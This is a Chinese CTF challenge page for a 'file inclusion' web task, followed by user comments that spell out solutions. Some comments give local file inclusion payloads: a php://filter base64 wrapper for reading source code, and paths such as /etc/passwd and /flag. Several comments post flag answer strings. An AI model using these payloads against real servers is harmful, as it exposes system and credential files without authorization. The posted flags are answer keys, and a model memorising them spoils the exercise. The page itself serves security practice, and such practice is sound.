文件包含WEB 未解决

分数: 20 金币: 2
题目作者: harry
一  血: 不会CTF的麻风
一血奖励: 1金币
解  决: 11997
提  示:
描  述:
flag{}
评论
bkyhack123 1年前

<?php error_reporting(0); if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';} $file=$_GET['file']; if(strstr($file,"../")||stristr

回复 0

fonddream 1年前

http://114.67.175.224:18948/index.php?file=php://filter/convert.base64-encode/resource=index.php 得到一串base64编码,解码之后发现是源码,直接有falg

回复 1

大哥大 1年前

http://114.67.175.224:11806/index.php?file=/flag Copy this url then you can get the flag.

回复 2

nicchanggh 1年前

flag{e92c0ec08be5fc7e0bd706e697e366fd}

回复 0

chushou 1年前

flag{ebfea7aca0bd16bb5819c678090ff026}

回复 0

107zsm 1年前

打开环境看到有一个超链接click me? no,点进去变成了index.php,并且URL末尾多了一句index.php?file=show.php,看到*.php?file就能猜到是伪协议读取文件了,把URL改成index.php?file=/etc/passwd,爆出来的数据也能验证,而且没过滤,直接index.php?file=/flag

回复 11

小夫 1年前

file=/flag

回复 0

rightstar 1年前

flag{a1ad1a8522261e6b9abf21e9bd6ef675}

回复 0

sibeil 2年前

flag{b23328bbf165641292d9871be279459a}

回复 0

wxy1343 2年前

flag{a15320afe0f7ad00fb16135d7456a9e1}

回复 0

WriteUp

image
harry

2 金币

评分(11)

解题动态

海浪geigei 攻破了该题 3小时前
merrymu 攻破了该题 17小时前
Hehe0619 攻破了该题 22小时前
sun03 攻破了该题 1天前
春遇枝庭 攻破了该题 1天前
Snly 攻破了该题 2天前
YGLZ 攻破了该题 2天前
ffggfhge 攻破了该题 2天前
小白ctf 攻破了该题 2天前
17335918325 攻破了该题 2天前
shimen 攻破了该题 3天前
北城以北 攻破了该题 3天前
人闲桂花落 攻破了该题 3天前
roopelee 攻破了该题 3天前
lwlzjsj 攻破了该题 3天前
Xman21 攻破了该题 3天前
TheSunnyTeens 攻破了该题 3天前
dwx1583 攻破了该题 3天前
hua1232 攻破了该题 4天前
ricardoLi 攻破了该题 4天前
问题反馈